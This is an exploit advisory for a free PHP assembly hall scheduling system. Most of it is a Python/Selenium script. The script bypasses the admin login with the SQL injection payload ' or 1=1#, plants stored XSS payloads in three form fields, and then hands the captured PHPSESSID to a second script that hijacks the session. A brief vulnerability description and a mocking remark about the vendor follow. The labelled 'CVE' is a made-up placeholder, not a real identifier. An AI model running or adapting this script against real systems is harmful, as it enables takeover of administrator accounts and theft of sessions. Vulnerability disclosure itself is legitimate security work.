### Exploit Title: AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 09.15.2021 ### Vendor: https://www.sourcecodester.com/user/257130/activity ### Link: https://www.sourcecodester.com/php/14902/simple-assembly-hall-scheduling-system-php-free-source-code.html ### CVE: CVE-nu11-11 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug and Developement: @nu11secur1ty # CVE-nu11-11-09152021 from selenium import webdriver import time import os from colorama import init, Fore, Back, Style init(convert=True) import requests #enter the link to the website you want to automate login. website_link="http://localhost/scheduler/admin/login.php" #enter your login username username="nu11secur1ty' or 1=1#" #enter your login password password="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") time.sleep(1) exploit_link=" http://localhost/scheduler/admin/?page=assembly_hall/manage_assembly" browser.get((exploit_link)) browser.execute_script("document.querySelector('[name=\"room_name\"]').value=\"<script>alert(document.cookie)</script>\"") browser.execute_script("document.querySelector('[name=\"location\"]').value=\"<script>alert(document.cookie)</script>\"") browser.execute_script("document.querySelector('[name=\"description\"]').value=\"<script>alert(document.cookie)</script>\"") time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-flat btn-primary\"]').click()") coockie=browser.execute_script("return document.cookie") coockie=coockie.split("=")[1] print(coockie) browser.close() time.sleep(3) os.system("python PWNPHPSESSID.py " + coockie) print(Fore.GREEN +"The payload for CVE-nu11-11 is deployed...\n") print(Style.RESET_ALL) except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ------------------------------------------------------------------ ### Description: The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID - m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account. 2. XSS - Stored PHPSESSID Vulnerable - The vulnerable XSS app: is "manage_assembly", parameters: "room_name" "location" and "description" After the successful SQL injection, the malicious user can be storing an XSS payload whit who can take the active PHPSESSID session. 3. remote PHPSESSID - Injection - After the successful XSS attack the malicious user can take control of the administrative account of the system from everywhere by using the PHPSESSID, and then he can make a lot of bad things! ------------------------------------------------------------------- ### CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer! ### BR - [+] @nu11secur1ty System Administrator - Infrastructure and Penetration Testing Engineer -------------------------------------------------------------------